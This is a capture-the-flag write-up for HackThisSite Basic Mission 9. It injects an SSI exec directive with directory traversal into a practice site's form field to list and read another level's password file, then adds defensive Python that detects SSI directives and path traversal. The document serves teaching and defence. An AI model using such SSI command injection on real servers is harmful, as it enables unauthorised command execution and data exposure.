CTF · Very Easy
HackThisSite — Basic Mission 9
ducky
2026-05-19
Key Hint from the Page
"In my attempt to limit SSI to level 8 only, I mistakenly screwed up somewhere — there is a way to get the level 9 password."
Level 9 itself exposes no input field to inject into; the attack surface is still Basic 8.
Exploitation
Step 1 — Go back to Basic 8's name field
Use the SSI exec payload, but traverse into Level 9's directory:
<!--#exec cmd="ls ../../9/"-->
Step 2 — Submit & Click the Link
Output in the .shtml file:
index.php p91e283zc3.php
Step 3 — Access the Password File
Navigate to:
https://www.hackthissite.org/missions/basic/9/p91e283zc3.php
Returns the plaintext password → submit in Level 9 → Congratz!
Root Cause
SSI execution in Basic 8 was never properly sandboxed. Combined with no path restriction on cmd=, directory traversal (../../9/) lets an attacker reach any adjacent directory on the server.
Key Takeaway
A vulnerability in one module can compromise another. SSI execution must be fully disabled or strictly sandboxed — partial restrictions with no path validation are ineffective.
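The takeaway above, as an added defender-side example that is not part of the original writeup: the Python below shows two of the controls it calls for. `find_ssi_directives` and `neutralize_ssi` detect and defuse SSI directives in user text before it is written into a server-parsed file (the Basic 8 defect), and `path_is_contained` is the missing path validation that rejects `../../9/`-style references. The module directory `/srv/missions/basic/8`, the function names and the sample inputs are assumptions constructed for this example; the server-level fix (Apache `Options IncludesNOEXEC`, or not enabling `Includes` at all for user content) is noted in a comment.

```python
import posixpath
import re
from pathlib import PurePosixPath

# Assumed layout for the example: each mission lives in its own directory and
# user-supplied text must never reference anything outside the module that
# received it. This path is a constructed placeholder, not the site's own.
MODULE_DIR = "/srv/missions/basic/8"

# Matches the opener of an SSI directive, e.g. <!--#exec cmd="..."-->,
# tolerating whitespace variants such as "<!-- #exec".
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*([A-Za-z]+)")


def find_ssi_directives(text: str) -> list[str]:
    """Return the lower-cased names of SSI directives found in user text.

    Detection only: useful for logging or alerting on attempted injection.
    """
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]


def neutralize_ssi(text: str) -> str:
    """Make user text inert before it is written into a server-parsed file.

    HTML-escaping '<' and '>' breaks the '<!--#' opener, so even a file the
    server still parses for SSI cannot execute anything taken from the user.
    The real fix is server-side: serve user content from a location without
    'Options Includes', or use 'Options IncludesNOEXEC' so #exec is refused.
    """
    return text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


def path_is_contained(base_dir: str, requested: str) -> bool:
    """True only if `requested`, resolved against `base_dir`, stays inside it.

    Pure string normalization (no filesystem access): '..' segments are
    collapsed before the containment check, and absolute paths are rejected.
    """
    base = PurePosixPath(posixpath.normpath(base_dir))
    target = PurePosixPath(posixpath.normpath(posixpath.join(base_dir, requested)))
    return target == base or base in target.parents


def screen_submission(name: str, base_dir: str = MODULE_DIR) -> dict:
    """Combine the checks the way a guestbook-style handler would.

    Returns the value safe to store plus the findings to log; nothing here
    executes or touches the filesystem.
    """
    directives = find_ssi_directives(name)
    # Every path-like token in the input is checked against the module directory.
    traversal = [tok for tok in re.findall(r"[\w./-]+", name)
                 if "/" in tok and not path_is_contained(base_dir, tok)]
    return {
        "store": neutralize_ssi(name),
        "ssi_directives": directives,
        "traversal_attempts": traversal,
        "suspicious": bool(directives or traversal),
    }


if __name__ == "__main__":
    # Constructed inputs: a benign name and the payload shape from the writeup.
    for sample in ("ducky", '<!--#exec cmd="ls ../../9/"-->'):
        print(screen_submission(sample))
```

`path_is_contained` deliberately works on strings rather than `os.path.realpath`, so it can be applied to a submitted value before anything is created on disk; a check that only runs after the file exists is the kind of partial restriction the takeaway warns about.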
Tags: #hackthissite #Basic Mission 9 #basic-mission-9